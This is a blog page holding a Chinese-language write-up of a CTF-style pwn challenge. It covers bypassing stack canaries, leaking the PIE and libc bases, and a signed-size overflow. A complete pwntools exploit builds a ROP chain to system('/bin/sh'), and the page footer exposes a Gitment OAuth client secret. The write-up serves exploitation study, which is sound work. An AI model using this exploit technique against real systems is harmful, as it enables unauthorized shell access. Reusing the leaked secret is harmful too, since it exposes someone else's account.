
<!doctype html>














<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/assets/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/assets/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/assets/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="stack canary pie," />





  <link rel="alternate" href="/atom.xml" title="Chivalry" type="application/atom+xml" />



















<meta name="description" content="绕过canary &amp;amp; 确定基址">
<meta name="keywords" content="stack canary pie">
<meta property="og:type" content="article">
<meta property="og:title" content="smallbug3">
<meta property="og:url" content="http://localhost:4000/sundry/2019/07/18/smallbug3/">
<meta property="og:site_name" content="Chivalry">
<meta property="og:description" content="绕过canary &amp;amp; 确定基址">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://c-ssl.duitang.com/uploads/item/201907/18/20190718130832_82SPi.png">
<meta property="og:image" content="https://c-ssl.duitang.com/uploads/item/201907/18/20190718124702_rz8kk.png">
<meta property="og:image" content="https://c-ssl.duitang.com/uploads/item/201907/18/20190718131614_PjAaf.png">
<meta property="og:image" content="https://c-ssl.duitang.com/uploads/item/201907/18/20190718132149_Z3Anv.png">
<meta property="og:image" content="https://c-ssl.duitang.com/uploads/item/201907/18/20190718140553_Xj5Cz.png">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="smallbug3">
<meta name="twitter:description" content="绕过canary &amp;amp; 确定基址">
<meta name="twitter:image" content="https://c-ssl.duitang.com/uploads/item/201907/18/20190718130832_82SPi.png">


<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://localhost:4000/"/>





  <title>smallbug3 | Chivalry</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ff6a93bdd23ba3d7a62f625966d58e96";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>











</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Chivalry</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

<div id="posts" class="posts-expand">
  
  

  

  
  
  

  <article class="post post-type- " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://localhost:4000/sundry/2019/07/18/smallbug3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Cyth">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="assets/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Chivalry">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
          
          
            smallbug3
          
        </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-18T00:00:00+08:00">
                2019-07-18
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/category/#/sundry" itemprop="url" rel="index">
                    <span itemprop="name">sundry</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          
            
                <div class="post-description">
                    
                </div>
            
          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        
  
  












  <p><strong><font style="font-size:25px">绕过canary &amp; 确定基址</font></strong></p>

<h1 id="canary">Canary</h1>

<h2 id="概念">概念</h2>

<p>canary是一个保护机制，具体的实现，是在<strong>ebp和esp</strong>之间放入一个canary值，在程序结束的时候判断是否被更改，改变则通过__stack_chk_fail结束当前进程。一定程度上可以防止栈溢出攻击。
<img src="https://c-ssl.duitang.com/uploads/item/201907/18/20190718130832_82SPi.png" alt="avatar" />  <br />
注意这里的var_8,就是放canary值的偏移。</p>

<p><img src="https://c-ssl.duitang.com/uploads/item/201907/18/20190718124702_rz8kk.png" alt="avatar" /></p>

<h2 id="特性">特性</h2>

<p>占用一个字的大小，canary值的最低位一定是\x00。</p>

<h2 id="绕过方法">绕过方法</h2>

<h3 id="劫持__stack_chk_fail">劫持__stack_chk_fail</h3>

<p>canary被改写后，程序流程就会经过__stack_chk_fail退出程序。如果将这个函数劫持</p>
<ul>
  <li>例如更改got表</li>
</ul>

<p>就可以在canary检查失败后劫持程序。</p>

<h3 id="泄露canary值">泄露canary值</h3>

<p>canary保护机制仅仅检查canary的值是否被篡改，而不会检查栈的其他内容。因此如果每次栈溢出的时候覆盖为相同的值就可以通过检查。</p>

<h4 id="如何泄露">如何泄露</h4>

<p>canary在存储时的最高位（小端序）是’\x00’，会截断canary值和前面的内容。只要将’\x00’覆盖成不会截断字符串打印的值，就可以通过打印字符串的形式得到当前canary值。</p>

<h4 id="canary的生成">canary的生成</h4>

<p>同一个线程里面的canary值是相同的。</p>

<h3 id="爆破">爆破</h3>

<p>还没试过。与<code class="highlighter-rouge">fork()</code>这个函数和线程有关。</p>

<h3 id="覆盖与栈中canary值进行比较的值">覆盖与栈中canary值进行比较的值</h3>

<p><img src="https://c-ssl.duitang.com/uploads/item/201907/18/20190718131614_PjAaf.png" alt="avatar" /></p>

<h1 id="思路">思路</h1>

<h2 id="漏洞点">漏洞点</h2>

<p><img src="https://c-ssl.duitang.com/uploads/item/201907/18/20190718132149_Z3Anv.png" alt="avatar" /></p>

<p>程序在判断大小的时候nbytes是做的有符号数，而在read中做参数的时候是无符号数。输入负数即可绕过判断进行栈溢出。</p>

<h2 id="流程">流程</h2>

<p>这个二进制文件checksec一下会发现所有的保护都开了。 <br />
<code class="highlighter-rouge">FULL RELRO</code>意味着没法改got表，所以要泄露canary的值。
要进行三次栈溢出。</p>
<ul>
  <li>打印canary的值&amp; 泄露程序基址</li>
  <li>泄露libc基址</li>
  <li>getshell</li>
</ul>

<h3 id="程序基址怎么泄露">程序基址怎么泄露</h3>

<p>我暂时还没有找到相关资料，但是我打开了一些二进制文件，发现在main函数里面的时候：</p>
<ul>
  <li>32位的ebp指向的栈里保存的是0x0</li>
  <li>64位的rbp指向的栈里保存的是__libc_csu_init的地址。</li>
  <li>我还搞不清楚的是为什么__libc_csu_init的地址不是7f开头而是与程序加载基址有关。</li>
</ul>

<p>我们如果用这个想法来看这个程序的rbp，</p>

<p><img src="https://c-ssl.duitang.com/uploads/item/201907/18/20190718140553_Xj5Cz.png" alt="avatar" /></p>

<p>虽然他去符号化了，但是按照这个思路来说，就可以根据__libc_csu_init的地址找到main的地址。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code><span class="n">main_addr</span> <span class="o">=</span> <span class="n">__libc_csu_init_addr</span> <span class="o">&amp;</span> <span class="p">(</span><span class="o">~</span><span class="mh">0xfff</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x9cc</span>
</code></pre></td></tr></tbody></table></div></div>
<p><code class="highlighter-rouge">0x9cc</code> 是从ida里面看的main地址。因为他开了pie，所以这个只是一个偏移地址。程序加载基址是<code class="highlighter-rouge">__libc_csu_init_addr &amp; (~0xfff)</code></p>

<p><strong><font style="font-size:30px"> 待补充原因</font></strong></p>

<h3 id="libc基址怎么泄露">libc基址怎么泄露</h3>

<p>使用puts打印出puts@got的内容。</p>

<h3 id="getshell">getshell</h3>

<p>可以使用one_gadget,也可以直接构造<code class="highlighter-rouge">system('/bin/sh')</code>,但是如果打远程的话需要知道libc的版本。</p>

<p>系统中断不行，找不到int 0x80。</p>

<h3 id="注意点">注意点</h3>

<ol>
  <li>程序是64位，采用寄存器传参，需要使用pop_rdi_ret。</li>
  <li>地址低位为<code class="highlighter-rouge">\x00</code>时在<code class="highlighter-rouge">u64()</code>的前面补<code class="highlighter-rouge">\x00</code>，高位则在后面。</li>
</ol>

<h2 id="坑">坑</h2>

<p>为什么gdb.attach的位置会影响exp？？？</p>

<h1 id="exp">exp</h1>

<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/>12<br/>13<br/>14<br/>15<br/>16<br/>17<br/>18<br/>19<br/>20<br/>21<br/>22<br/>23<br/>24<br/>25<br/>26<br/>27<br/>28<br/>29<br/>30<br/>31<br/>32<br/>33<br/>34<br/>35<br/>36<br/>37<br/>38<br/>39<br/>40<br/>41<br/>42<br/>43<br/>44<br/>45<br/>46<br/>47<br/>48<br/>49<br/>50<br/>51<br/>52<br/>53</pre></td><td class="code"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'debug'</span>
<span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s">'deepin-terminal'</span><span class="p">,</span><span class="s">'-x'</span><span class="p">,</span><span class="s">'sh'</span><span class="p">,</span><span class="s">'-c'</span><span class="p">]</span>

<span class="n">sh</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./smallbug3'</span><span class="p">)</span>
<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'./smallbug3'</span><span class="p">)</span>
<span class="n">libc</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">libc</span>

<span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s">"===================&gt;fake size&lt;================="</span><span class="p">)</span>
<span class="n">sh</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'name:</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span><span class="s">"-1"</span><span class="p">)</span>
<span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s">"===============&gt;leak canary value&lt;=============="</span><span class="p">)</span>
<span class="n">offset</span> <span class="o">=</span> <span class="mh">0x94</span> <span class="o">-</span> <span class="mh">0x4</span> <span class="o">-</span> <span class="mh">0x8</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s">'A'</span> <span class="o">*</span> <span class="n">offset</span> <span class="o">+</span> <span class="s">'B'</span>

<span class="n">sh</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s">'name:</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span><span class="n">payload</span><span class="p">)</span>
<span class="n">sh</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"B"</span><span class="p">)</span>
<span class="n">canary</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">+</span> <span class="n">sh</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">7</span><span class="p">))</span>
<span class="k">print</span> <span class="s">'-------------------{:#x}-----------------'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span>

<span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s">"=============&gt;leak process main addr &lt;==========="</span><span class="p">)</span>
<span class="n">elf_base</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span> <span class="n">sh</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00\x00</span><span class="s">'</span><span class="p">)</span> <span class="o">&amp;</span> <span class="p">(</span><span class="o">~</span><span class="mh">0xfff</span><span class="p">)</span>
<span class="n">main_addr</span> <span class="o">=</span> <span class="n">elf_base</span> <span class="o">+</span> <span class="mh">0x9cc</span>

<span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s">"===============&gt;leak libc base&lt;=================="</span><span class="p">)</span>
<span class="n">puts_got</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span> <span class="o">+</span> <span class="n">elf_base</span>
<span class="n">puts_plt</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span> <span class="o">+</span> <span class="n">elf_base</span>
<span class="n">pop_rdi_ret</span> <span class="o">=</span> <span class="mh">0xb33</span> <span class="o">+</span> <span class="n">elf_base</span>

<span class="n">payload</span> <span class="o">=</span> <span class="s">'A'</span><span class="o">*</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0xdeadbeef</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">puts_got</span><span class="p">)</span> 
<span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">puts_plt</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main_addr</span><span class="p">)</span>


<span class="n">sh</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'us:</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span><span class="n">payload</span><span class="p">)</span>
<span class="n">libc_base</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">sh</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\x7f</span><span class="s">'</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:]</span><span class="o">+</span><span class="s">'</span><span class="se">\x00\x00</span><span class="s">'</span><span class="p">)</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span>

<span class="k">print</span> <span class="s">'-------------------main_addr:{:#x}-----------------'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">main_addr</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'-------------------libc_base:{:#x}-----------------'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc_base</span><span class="p">)</span>

<span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s">'===============&gt;get shell&lt;======================='</span><span class="p">)</span>
 <span class="c">#one_gadget local_libc</span>
<span class="n">one_gadget</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x4239e</span>
<span class="n">system_addr</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
<span class="n">bin_addr</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s">'/bin/sh'</span><span class="p">)</span><span class="o">.</span><span class="nb">next</span><span class="p">()</span>

<span class="n">sh</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'name:</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span><span class="s">"-1"</span><span class="p">)</span>
<span class="n">sh</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'name:</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span><span class="s">'A'</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span>
<span class="c">#payload = 'A' * offset + p64(canary) + 'A' * 8 + p64(one_gadget)</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s">'A'</span> <span class="o">*</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="s">'A'</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bin_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">system_addr</span><span class="p">)</span>
<span class="n">sh</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">'us:</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span><span class="n">payload</span><span class="p">)</span>

<span class="n">sh</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
<span class="n">sh</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></td></tr></tbody></table></div></div>


      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            
            <a href="/tag/#/stack%20canary%20pie" rel="tag"># stack canary pie</a>
          
        </div>
      

      
      
      
      
      

      
      
        <div class="post-nav" id="post-nav-id">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/hitcon_trainning/2019/07/15/bamboobox/" rel="prev" title="lab11_bamboobox">
                lab11_bamboobox <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      
      

      
    </footer>
  </article>

  <div class="post-spread">
    
  </div>
</div>


<div id="gitmentContainer"></div>
<link rel="stylesheet" href="https://jjeejj.github.io/css/gitment.css">
<script src="https://jjeejj.github.io/js/gitment.js"></script>
<script>
var gitment = new Gitment({
    id: decodeURI(window.location.pathname),
    owner: 'CythZ',
    repo: 'CythZ.github.io',
    oauth: {
        client_id: '7f9aa36ea2ba7a10b6ff',
        client_secret: '170fc93045774170b9952e46f249d8ea0d718a99',
    },
});
gitment.render('gitmentContainer');
</script>
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          

  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      
        
        
        







      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/assets/images/avatar.gif"
               alt="Cyth" />
          <p class="site-author-name" itemprop="name">Cyth</p>
           
              <p class="site-description motion-element" itemprop="description">认真勤奋就会有回报的赤诚。</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">6</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
        
        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            








            
              <div class="post-toc-content">
    <ol class=nav>
      <li class="nav-item nav-level-1"> <a class="nav-link" href="#canary"> <span class="nav-number">1</span> <span class="nav-text">Canary</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#概念"> <span class="nav-number">1.1</span> <span class="nav-text">概念</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#特性"> <span class="nav-number">1.2</span> <span class="nav-text">特性</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#绕过方法"> <span class="nav-number">1.3</span> <span class="nav-text">绕过方法</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#劫持__stack_chk_fail"> <span class="nav-number">1.3.1</span> <span class="nav-text">劫持__stack_chk_fail</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#泄露canary值"> <span class="nav-number">1.3.2</span> <span class="nav-text">泄露canary值</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-4"> <a class="nav-link" href="#如何泄露"> <span class="nav-number">1.3.2.1</span> <span class="nav-text">如何泄露</span> </a> </li> <li class="nav-item nav-level-4"> <a class="nav-link" href="#canary的生成"> <span class="nav-number">1.3.2.2</span> <span class="nav-text">canary的生成</span> </a> </li> </ol> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#爆破"> <span class="nav-number">1.3.3</span> <span class="nav-text">爆破</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#覆盖与栈中canary值进行比较的值"> <span class="nav-number">1.3.4</span> <span class="nav-text">覆盖与栈中canary值进行比较的值</span> </a> </li> </ol> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#思路"> <span class="nav-number">2</span> <span class="nav-text">思路</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#漏洞点"> <span class="nav-number">2.1</span> <span class="nav-text">漏洞点</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#流程"> <span class="nav-number">2.2</span> <span class="nav-text">流程</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#程序基址怎么泄露"> <span class="nav-number">2.2.1</span> <span class="nav-text">程序基址怎么泄露</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#libc基址怎么泄露"> <span class="nav-number">2.2.2</span> <span class="nav-text">libc基址怎么泄露</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#getshell"> <span class="nav-number">2.2.3</span> <span class="nav-text">getshell</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#注意点"> <span class="nav-number">2.2.4</span> <span class="nav-text">注意点</span> </a> </li> </ol> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#坑"> <span class="nav-number">2.3</span> <span class="nav-text">坑</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#exp"> <span class="nav-number">3</span> <span class="nav-text">exp</span> </a> </li>
    </ol>
  </div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>

        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cyth</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://jekyllrb.com">Jekyll</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/simpleyyt/jekyll-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>





















  
   
  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery/index.js?v=2.1.3"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/assets/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/assets/js/src/motion.js?v=5.1.1"></script>



  
  

  <script type="text/javascript" src="/assets/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/assets/js/src/post-details.js?v=5.1.1"></script>


  


  <script type="text/javascript" src="/assets/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  











  




  

    

  







  






  

  

  
  


  

  

  

</body>
</html>

